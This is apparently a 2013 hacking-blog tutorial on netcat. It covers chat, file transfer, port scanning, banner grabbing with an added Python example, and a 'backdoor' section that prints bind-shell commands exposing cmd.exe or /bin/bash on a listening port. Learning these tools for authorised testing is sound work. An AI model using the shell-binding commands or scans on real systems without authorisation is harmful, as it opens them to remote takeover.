
Tuesday 8 October 2013

Hacker's Swiss Army Knife - Netcat for Penetration testers from Scanning to Hacking

This thread will discuss the following things :-

1. What is Netcat?
2. Its features.
3. Installation methods
- Windows box.
- Linux box.
4. Netcat One Man Army
- Multiple tools / uses by name.
5. Netcat as Chat Server.
6. Netcat as File Transferring Application.
7. Netcat as Port Scanning Tool.
8. Netcat as Banner Grabbing Machine.
9. Netcat as Backdoor / Remote Pwning - Granting Access to Create, Edit, Delete and S***.
10. Netcat as System-in-Law Conclusion.




What is Netcat ?


Netcat is a tool which can read and write data across any TCP or UDP network connection. Since it gives us a raw read/write mechanism on any TCP or UDP connection, we can definitely juice out a lot of stuff from it...


So, let's see what its features are :-


Some of Netcat's features are:
  • Outbound or inbound connections, TCP or UDP, to or from any ports
  • Full DNS forward/reverse checking, with appropriate warnings
  • Ability to use any local source port
  • Ability to use any locally-configured network source address
  • Built-in port-scanning capabilities, with randomizer
  • Built-in loose source-routing capability
  • Can read command line arguments from standard input
  • Slow-send mode, one line every N seconds
  • Hex dump of transmitted and received data
  • Optional ability to let another program service established connections
  • Optional telnet-options responder
This list was taken from the vulnwatch.org website, which no longer exists.

So, after getting to know all these features, you may want to give it a try; here is how to get Netcat and install it.


Installation Methods


Google Search Results for: Download Netcat
After you have downloaded it, here is how you run it :-

For Windows :-
- Unzip and run your netcat.exe or nc.exe file, that's it.

For Linux :-
- Unzip, go to the Netcat directory and build it, or install it from your distribution's package manager.
Code:
root@worldofhacker# make
root@worldofhacker# make install

or

root@worldofhacker# apt-get install nc*

or

root@worldofhacker# yum install nc*

That's it. Now I assume you have a running netcat with you, so I will take you to the Netcat Discovery Channel.

Netcat is a single tool that can do many jobs, including but not limited to the following.


Netcat One Man Army


1. Netcat as Chat Server.
2. Netcat as File Transferring Application.
3. Netcat as Port Scanning Tool.
4. Netcat as Banner Grabbing Machine.
5. Netcat as Backdoor/Remote Pwning - Granting Access to Create, Edit, Delete and S***.

So, Let's Discuss all those Features.


1. Netcat as Chat Server

System A [listens on port 1234] :-
Code:
c:\> nc.exe -lvp 1234

or, on a Linux system:

krokite@worldofhacker~$ nc -lvp 1234

System B [connects to System A] :-
Code:
c:\> nc.exe -v [system_A_ip] 1234

or, on a Linux system:

krokite@worldofhacker~$ nc -v [system_A_ip] 1234

Whatever is typed on either side is sent to the other side. Note that on the client -p would set the local source port, not the destination port, so the destination port is given as the last argument.


2. Netcat as File Transferring Application.


System A [Receiving the File] - listen on port 1234 and redirect whatever arrives into a file
Code:
c:\> nc.exe -l -p 1234 > worldofhacker.txt

or, on a Linux system:

krokite@worldofhacker~$ nc -l -p 1234 > worldofhacker.txt

System B [Sending the File] - connect to System A and feed the file in on standard input
Code:
c:\> nc.exe [system_A_ip] 1234 < krokite.txt

or, on a Linux system:

krokite@worldofhacker~$ nc [system_A_ip] 1234 < krokite.txt


3. Netcat as Port Scanning Tool.



Code:
c:\> nc.exe -v -w2 -z [target_system_ip] 1-443

or, on a Linux system:

krokite@worldofhacker~$ nc -v -w2 -z [target_system_ip] 1-443

or, with a list of specific ports:

c:\> nc.exe -v -w2 -z [target_system_ip] 80,21,20,53,22,25,110,143,443

krokite@worldofhacker~$ nc -v -w2 -z [target_system_ip] 80,21,20,53,22,25,110,143,443

-w means wait: the number of seconds to wait for a connection before giving up on that port.
-v means verbose mode, i.e. display what the program is doing as it goes.
-z is used for scanning purposes [Zero-I/O]: netcat only checks whether the port accepts a connection and sends no data.
1-443 means ports 1 to 443; you can also specify a list like 80,81,82,21,22,20,53, etc.


4. Netcat as Banner Grabbing Machine.



Code:
c:\> nc.exe -vvn [target_ip] [port_number]

or, on a Linux system:

krokite@worldofhacker~$ nc -vvn [target_ip] [port_number]

e.g.

c:\> nc.exe -vvn 1.1.1.1 80
GET / HTTP/1.0

krokite@worldofhacker~$ nc -vvn 1.1.1.1 80
GET / HTTP/1.0

Press Enter twice after you type the GET request, so that the blank line ending the HTTP request is sent.

For port 80, i.e. an HTTP request, you need to send a request method like [GET, PUT, HEAD, etc.]; the server's response headers are the banner.
If you change port 80 to 21 or any other port whose service speaks first, you don't have to type a GET request; the banner is printed as soon as you connect.

If you want to use a domain name instead of an IP, remove n from -vvn and just use -vv (-n tells netcat not to do DNS lookups).
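To show exactly what the port scan in section 3 and the banner grab in section 4 do on the wire, here is an added Python example (not from the original post or from netcat itself): it starts a throwaway listener on 127.0.0.1 serving a constructed HTTP banner, then performs a zero-I/O connect check (like -z -w) and a GET / HTTP/1.0 banner grab against it. Everything in it is hypothetical and constructed for this demonstration; run it against your own hosts to see which services leak version strings in their banners.

```python
import socket
import threading

# Constructed sample banner: what a web server might reveal to "GET / HTTP/1.0".
SAMPLE_BANNER = (b"HTTP/1.0 200 OK\r\nServer: ExampleHTTPd/1.0\r\n"
                 b"Content-Length: 0\r\n\r\n")

def serve_banner(banner):
    """Hypothetical stand-in for a real service: a throwaway listener on
    127.0.0.1 that answers any connection with `banner`. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    conn.settimeout(1.0)
                    conn.recv(1024)      # swallow the request line(s), if any
                    conn.sendall(banner)
                except OSError:          # peer closed early (zero-I/O connect)
                    pass
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def zero_io_scan(host, ports, timeout=2.0):
    """What `nc -v -z -w<timeout> host ports` does: complete the TCP handshake,
    send nothing, and report the ports that accepted the connection."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:                  # refused, filtered, or timed out
            pass
    return open_ports

def grab_banner(host, port, request=b"GET / HTTP/1.0\r\n\r\n", timeout=2.0):
    """What `nc -vv host port` plus typing the request and two Enters does:
    send the request and return the first response line, or None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            data = s.recv(4096)
    except OSError:
        return None
    return data.split(b"\r\n", 1)[0].decode(errors="replace") or None
```

Call serve_banner(SAMPLE_BANNER) to get a port, then zero_io_scan("127.0.0.1", [port]) and grab_banner("127.0.0.1", port); the banner grab returns the status line "HTTP/1.0 200 OK" and a closed port returns None.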


5. Netcat as Backdoor/Remote Pwning


System A [listens and hands the connection to a shell]
Code:
c:\> nc.exe -lp 1234 -e cmd.exe

or, on a Linux system:

krokite@worldofhacker~$ nc -lp 1234 -e /bin/bash

System B [connects and gets the shell]
Code:
c:\> nc.exe [system_A_ip] 1234

or, on a Linux system:

krokite@worldofhacker~$ nc [system_A_ip] 1234


System in Law - Conclusion

Hacking is illegal, but penetration testing with complete authority is legal. Do not use the given knowledge to attack or harm any person; if you do so, I [KroKite] or Worldofhacker.com will not be responsible for what you do with this knowledge.

That's it. Good luck.

Search more, explore more.. Here are a few Google results from my side :-
Resource Center
Google Search Results for: Download netcat
Google Search Results for: Netcat Swiss army knife
http://www.jfranken.de/homepages/johannes/vortraege/netcat_inhalt.en.html - Recommended, and there are many more..

If you reply here with a link, I will add it to the resource center here :-


Copyright © KroKite


Any Question Put them Below.
 
World of Hacker © 2011 Creative Commons License
World of Hacker by KroKite is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.
Based on a work at http://www.worldofhacker.com.
Permissions beyond the scope of this license may be available at https://groups.google.com/forum/#!newtopic/hackerforum.